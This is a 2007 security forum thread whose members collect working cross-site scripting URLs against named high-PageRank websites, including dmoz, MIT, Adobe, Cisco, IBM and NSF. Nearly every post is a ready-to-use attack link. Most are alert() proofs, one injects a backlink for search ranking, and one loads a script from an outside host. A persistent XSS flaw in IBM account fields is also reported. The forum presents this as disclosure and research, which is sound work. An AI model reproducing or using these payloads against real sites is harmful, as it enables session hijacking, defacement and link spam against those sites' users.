Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
SEO special (Dmoz)
Posted by: digi7al64
Date: September 25, 2007 11:25PM

http://blog.dmoz.org/search/?q=%22<script>alert(1);</script>
http://search.mit.edu/search?q=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&btnG.x=0&btnG.y=0&site=mit&client=mit&proxystylesheet=http%3A%2F%2Fspruce-goose.csail.mit.edu%2Fsearch%2Fgoogle-csail.xsl&output=xml_no_dtd&as_dt=i&as_oq=site%3Awww.csail.mit.edu%20site%3Apublications.csail.mit.edu



EDIT: This is the list we are after
http://www.searchenginegenie.com/pagerank-10-sites.htm

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 3 time(s). Last edit at 09/26/2007 02:04AM by digi7al64.

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: Spyware
Date: September 26, 2007 06:27AM

http://store1.adobe.com/cfusion/store/html/index.cfm?event=displayStoreSelector&keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

EDIT

Sorry, the shop sub-domain isn't in the list ;x



Edited 1 time(s). Last edit at 09/26/2007 06:34AM by Spyware.

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: beford
Date: September 26, 2007 09:38AM

http://www.real.com/dmm/superpass/haokan/english?pageid=broadBandHomePage_3&pageregion=bottom_region&src=realhome_bb_3_1_1_0_0_1_0%22%3E%3Ch4%3Ex&pcode=rn%22%3E%3C/a%3E%3C/a%3E%3Ca%20href=%22http://blog.beford.org/%22%3Ebeford.org%3C/a%3E%3Cnoscript%3E&opage=realhome_bb

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: digi7al64
Date: September 26, 2007 11:33PM

http://www.cisco.com/pcgi-bin/search/search.pl?searchPhrase=%22%27+onmouseover%3D%27alert%281%29%27%3B&x=14&y=10&accessLevel=Guest&language=en&country=US&Search+All+Cisco.com=cisco.com

needs mouseover to trigger <> are both removed from search

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: Anonymous User
Date: September 27, 2007 11:41AM

Ehm, can't you just post the regular XSS in "So it begins"? since it's just XSS? just a thought.

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: digi7al64
Date: September 27, 2007 06:47PM

"So it begins" is 53 pages long (way too long)... and besides this thread is targetted at sites with a PR of 10.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: Anonymous User
Date: September 28, 2007 09:49AM

Yah I forgot that those sites are PR10, sorry feel free to go ahead of course!

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: tx
Date: September 28, 2007 12:38PM

http://www-1.ibm.com/gold/portal/servlet/gold/Content?contentURL=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C/script%3E%3C%21%20html/0.html

http://www-1.ibm.com/gold/portal/servlet/gold/Content?contentURL=%3Cimg%20src%20onerror%3Dalert%28%27xss%27%29>/en_US/201238.html <--- Thanks for the server name

there are many more around the site...

EDIT: persistant xss in first and last name fields for accounts.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/28/2007 03:53PM by tx.

Options: ReplyQuote
Re: SEO special (Dmoz)
Posted by: Anonymous User
Date: September 28, 2007 04:42PM

Here's some more PR10 stuff:

http://www.nsf.gov/news/mmg/mmg_disp.cfm?med_id=61608&from=m%22%3e%3cscript/src=//h4k.in/i.js%3e%3c/script%3emg

Greetings,
.mario



Edited 1 time(s). Last edit at 09/28/2007 04:43PM by .mario.

Options: ReplyQuote


Sorry, only registered users may post in this forum.